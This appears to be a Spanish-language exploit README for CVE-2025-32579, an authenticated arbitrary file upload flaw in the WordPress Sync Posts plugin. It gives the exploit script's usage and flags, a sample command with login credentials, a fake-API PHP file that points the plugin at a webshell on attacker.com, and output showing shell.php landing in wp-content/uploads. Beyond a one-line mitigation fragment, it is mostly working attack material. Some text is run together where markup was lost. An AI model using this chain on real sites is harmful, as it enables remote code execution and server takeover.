
El plugin WordPress Sync Posts <= 1.0 es vulnerable a la carga arbitraria de archivos.
📦 Afecta: Sync Posts <= 1.0
🧨 Puntuación CVSS: 9.9 CRÍTICA
📁 Vector CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
El plugin Sync Posts de WordPress, creado por SoftClever Limited, es vulnerable a una vulnerabilidad de carga de archivos sin restricciones que permite a atacantes autenticados cargar y ejecutar archivos PHP arbitrarios (como webshells) en el servidor.
website_url que devuelve publicaciones JSON.wp-content/uploads.El script de explotación automatiza toda la cadena:
<img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">website_url maliciosa a admin-ajax.php?action=sync_posts/uploads/usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL
Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://target.com/wordpress)
-un, --username USERNAME
Username to login
-p, --password PASSWORD
Password to login
-ws, --website WEBSITE
URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
-shell, --webshell WEBSHELL
Web shell URL used inside the fake API (can be a test image)
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php
También puedes usar una imagen de prueba en lugar de un shell real para probar:
--webshell https://via.placeholder.com/1x1.jpg
Esta es la respuesta devuelta por Khaled_alenazi.php:
<?php
header('Content-Type: application/json');
echo json_encode([
[
"id" => 1,
"title" => ["rendered" => "Nxploited"],
"content" => [
"rendered" => "<img src="http://attacker.com/shell.php">"
]
]
]);
?>
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
"success": true,
"data": {
"message": "Posts imported successfully",
...
}
}
shell.phpwp-content/uploads/2025/04/shell.phpwebsite_url a dominios internos o hosts en lista blancaCVE: CVE-2025-32579
Exploit por Nxploited (Khaled Alenazi)
| Flag | Description |
|---|
-u, --url | URL de WordPress objetivo |
-un, --username | Nombre de usuario de WordPress (admin) |
-p, --password | Contraseña de WordPress |
-ws, --website | URL del archivo PHP malicioso que devuelve una publicación JSON falsa |
-shell, --webshell | El archivo shell real para inyectar mediante `` |